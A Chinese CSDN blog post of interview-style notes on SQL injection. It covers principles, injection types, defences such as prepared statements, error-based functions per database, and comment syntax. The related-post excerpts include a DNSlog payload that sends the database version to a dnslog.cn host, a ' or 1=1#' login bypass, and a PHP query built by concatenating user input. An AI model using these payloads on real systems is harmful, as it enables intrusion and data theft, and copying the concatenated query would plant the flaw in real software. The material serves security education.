SQL注入原理/利用方式/应对方案

已于 2024-06-23 11:25:59 修改
阅读量1.5w 收藏 7
点赞数 5
分类专栏: 网络安全面试题汇总 文章标签: 渗透测试 安全 web安全 网络安全
于 2021-06-30 21:08:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118369428
版权

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

SQL注入被称为漏洞之王,是最常用的漏洞之一

SQL注入原理

SQL注入是指用户在参数中插入恶意的SQL语句 , 破坏原有的SQL语法结构,从而执行攻击者的操作

触发点/检测

SQL注入常出现在登录,搜索等功能,凡是与数据库交互的地方都有可能发生SQL注入

SQL注入利用方式

SQL注入根据注入点可以分为数值型注入字符型注入

根据注入方式可以分为联合注入,报错注入,布尔盲注,时间盲注,二次注入,堆叠注入,宽字节注入HTTP Header注入

其中HTTP Header注入又分 Referer注入 , Cookie注入 和 User-agent注入

时间盲注又有一种替代方式,叫DNSlog注入,也叫带外注入

SQL注入应对方案

分为三个方面: 参数过滤 , 预编译 以及 限制权限和报错

 参数过滤以各种厂商以及代码的WAF为主,比如替换空格,关键字,双写,大小写,特殊字符转义

预编译主要依赖各种框架,比如Java的mybatis框架 和 PHP的 thinkphp框架

限制权限和报错是指限制数据库的权限,以及控制数据库的报错信息,报错信息不要对外展示

报错注入函数

MySQL

  1. updatexml();        第二个参数包含特殊字符会报错
  2. extractvalue();     第二个参数包含特殊字符会报错
  3. floor();                 用来取整,不是数值就会报错

SQLserver

  1. convert();   用来类型转换,第二个参数包含特殊字符会报错
  2. cast();        用来类型转换,参数包含特殊字符会报错

Oracle

  1. 没有报错函数,可以用比较运算符报错

Access

  1. 不支持报错注入,只能使用枚举

MySQL和SQLserver的区别

  1. MySQL脱库时使用information_schema默认数据库,其中schemata存数据库,tables存表,columns存字段;SQLserver脱库时使用系统表,databases存数据库,objects存表,columns存字段
  2. MySQL支持limnt分页,SQLserver只能用top来替代分页
  3. MySQL支持双系统,SQLserver只能支持Windows系统

注释

  • MySQL:        -- , /**/ , #
  • SQLserver    -- , /**/
  • Oracle           -- , /**/
  • Access          没有注释

Access数据库

Access是文件型数据库,不需要端口号,它没有数据库的概念,所有表都在同一个数据库下,没有注释,不支持报错注入,也不能执行系统命令,有一个默认表msysobjects,可以用来判断数据库类型,Access脱库时只能用枚举,也就是配合exists()函数猜表名和列名

士别三日wyx
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sql注入漏洞原理
qq_51553814的博客
08-04 666
sql注入漏洞原理 #0x00:漏洞产生原理 sql注入是用户在提交参数时参杂了sql注入代码,并且被后端执行了,这样就导致漏洞的产生 下面是一个有注入漏洞的登陆界面的后端 用户通过前端把账号和密码分别提交到$userName 和$Password中 $conn=mysqli_connect($dbServername,$dbUsername,$dbPassword,$dbName);//连接数据库 $sql="SELECT * FROM user WHERE username='$userName' an
浅谈SQL注入漏洞原理利用方式
weixin_62369433的博客
11-15 2383
帮助读者快速理解SQL注入漏洞,更好的做出修复
SQL注入漏洞利用
jennycisp的博客
04-29 503
SQL注入是一种注入攻击,可以执行恶意SQL语句。这些语句控制Web应用程序后面的数据库服务器。攻击者可以利用SQL 注入漏洞规避应用程序安全性方面的努力。他们可以绕过页面或Web应用程序的身份验证和授权,并恢复整个SQL数据库的内容。他们同样可以利用SQL注入来包含,更改和擦除数据库中的记录。SQL注入漏洞可能会影响使用SQL数据库的任何站点或Web应用程序,例如MySQL,Oracle,MSSQL或其他。
sql注入(二)--联合查询及实际用途
xiao_xiao_lan的博客
04-23 401
联合查询预备练习问题1:已知goods中id等于2的字段内容,且已知还存在表create_test,想要通过goods中id=2来导出create_test中的内容:问题2:如何查询不同列数的两个表,下例中为联合查询另一个表(该表为4列):问题3:若网站将union过滤时,想要猜测另一张表(sqltest)的每一个列名 预备 假设先前已存在两个表create_test和goods: 练习 问题...
SQL注入盲注利用方法
小白渣的博客
02-27 1895
靠 真大佬写的 太太太qiang 辽 !!! 前言 最近做了些基于布尔盲注和基于时间盲注的CTF题,掌握了CTF题中SQL盲注的三种解法,收获很大,于是结合题目分享一下。 BASE-Blind-Inject 题目信息 题干分析 第一次走进误区,刚看到这道题的时候看到了登录框,第一印象应该就是简单的闭合注入,测试后发现是双引号闭合,所以构造payload注入 " or 1=1# 果...
【网络安全-SQL注入(3)】SQL注入----一篇文章教你access数据库SQL注入以及注入利用
m0_67844671的博客
10-01 997
本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入利用SQL注入【3】;
SQL注入攻击与防御技术白皮书.docx
10-16
1. SQL注入攻击原理 SQL注入攻击的核心在于利用应用程序对用户输入数据的不当处理。当应用程序没有对用户提供的数据进行充分的验证和过滤,而是直接将这些数据拼接到SQL查询语句中,攻击者就能构建出可执行的恶意...
极光-SQL注入V1.5.7 Win64 update by 2016-8-19
08-20
SQL注入攻击的原理是,攻击者利用网页表单或其他方式输入恶意的SQL代码,这些代码与服务器端的SQL查询结合,导致非预期的数据库操作。例如,如果一个登录页面没有对用户名和密码进行适当的转义或参数化处理,攻击者...
防jssql注入简易工具 v1.1.zip
最新发布
05-01
总的来说,防js/sql注入简易工具 v1.1是一个实用且高效的解决方案,它降低了开发者的安全维护成本,提升了应用的安全性。但需要注意的是,尽管有了这样的工具,开发者仍需保持警惕,定期更新和检查代码,因为安全...
一种轻量级的服务端防SQL注入攻击方法.pdf
09-19
总的来说,该文提出的轻量级服务端防SQL注入方法,通过巧妙地利用文本挖掘技术,提供了一种平衡安全性和性能的有效解决方案。这对于提升基于数据库的系统安全性,尤其是应对大规模信息处理场景下的SQL注入攻击,具有...
安全网站策略之_SQL注入的防范
04-05
标题中的“安全网站策略之_SQL注入的防范”指的是在网络安全领域中,针对SQL注入这一常见攻击方式所采取的防御措施。SQL注入是一种攻击手段,通过输入恶意的SQL语句,可以操控后台数据库,获取敏感信息,甚至破坏...
利用SQL注入漏洞登录后台
03-27
通过介绍SQL Injection的基本原理,讲解如何防范SQL Injection。通过一些程序源码对SQL的攻击进行了细致分析,使我们对SQL Injection机理有了一个深入认识,作为一名Web应用开发人员,一定不要盲目相信用户的输入,而要对用户输入的数据进行严格的校验处理,否则的话,SQL Injection将会不期而至。
SQL注入原理利用
Hunterj_Lin的博客
02-28 547
工具简介 SQLMAP: 一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多强大的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令。 常见参数使用 –sql-shell 执行SQL命令 –OS-cmd 执行系统命令 –OS-shell 与系统Shell交互 -r 加载外部请求包 –data=DATA 通过POST发送数据字符串 –proxy=PROX
什么是sql注入
2203_75699897的博客
04-19 952
SQL注入是一种利用应用程序中的漏洞,通过恶意构造的SQL语句来实现攻击的方法。这个语句的意思是,假设用户名的长度为1,如果后台返回的结果正确,则说明这个条件成立,否则说明条件不成立,我们需要尝试其他长度的用户名。其中,--表示注释掉后面的SQL语句,从而使得后面的单引号不会造成SQL语法错误,从而绕过了服务器端的SQL注入检测。总之,SQL注入攻击是一种常见的网络攻击方式,对于应用程序开发者和数据库管理员来说,了解SQL注入攻击的成因和防范措施,可以有效地保护应用程序和数据库的安全。
【Web安全基础】SQL注入原理利用
Yuan's Blog
08-24 215
文章目录定义注入类型实现过程万能密码 定义 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 注入类型 Time-based blind SQL injection(基于时间延迟注入) UNION query SQL injection(可联合查询注入) Error-based SQL injection(报错型注入) Boolean-based blind SQL injection(布尔型注入) Stacked queries SQL inje
SQL注入进阶-测试及利用方法总结
u013797594的博客
08-05 5530
SQL注入进阶-测试及利用方法总结 文章目录SQL注入进阶-测试及利用方法总结SQL注入漏洞简介SQL注入漏洞分类SQL注入漏洞检测及利用基于输入类型字符型注入整数型注入基于从服务器接收到的响应错误回显注入测姿势错误回显利用方法1.不同类型的数据加减乘除2.group by floor(rand(0)*2)产生错误利用姿势及注意事项3.extractvalue()产生错误利用姿势及注意事项4.updatexml( )利用姿势及注意事项5.exp double型数据溢出利用姿势及注意事项6.bigint溢出利
SQL注入——SQL注入漏洞讲解分类(零)
Gjqhs的博客
02-22 950
一、什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系 统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后 台数据库乃至整个应用系统的入侵 二、SQL注入原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响 数据库安全和平台安全。 两个条件 用户能够控制输入 原本程序要执行的SQL语句,拼接了用户输入的恶意数据 三、SQL注入过程 ①攻击者访问有SQL注入漏洞的网站,寻找注入点 ②
sql 注入 - 带外攻击
wcy19990628的博客
02-10 1174
带外攻击: http://localhost/sqli-labs-master/Less-8/?id=1' and load_file(concat("\\\\",version(),".fhig24.dnslog.cn\\1.txt")) -- - 带外攻击用到了load_file这个函数,利用load_file这个函数读取网络文件,其中访问的 记录会被记录下来,其中就用到了dnslog.cn...
SQL注入之DNSLog外带注入
dragon的博客
02-21 2599
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
sql注入 /**/
10-07
SQL注入是一种攻击技术,它利用未经正确过滤的用户输入将恶意SQL代码插入到应用程序的数据库查询中。在SQL注入中,/**/是多行注释的语法,可以用来绕过应用程序的输入过滤,使恶意注入的代码不被检测到。例如,在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值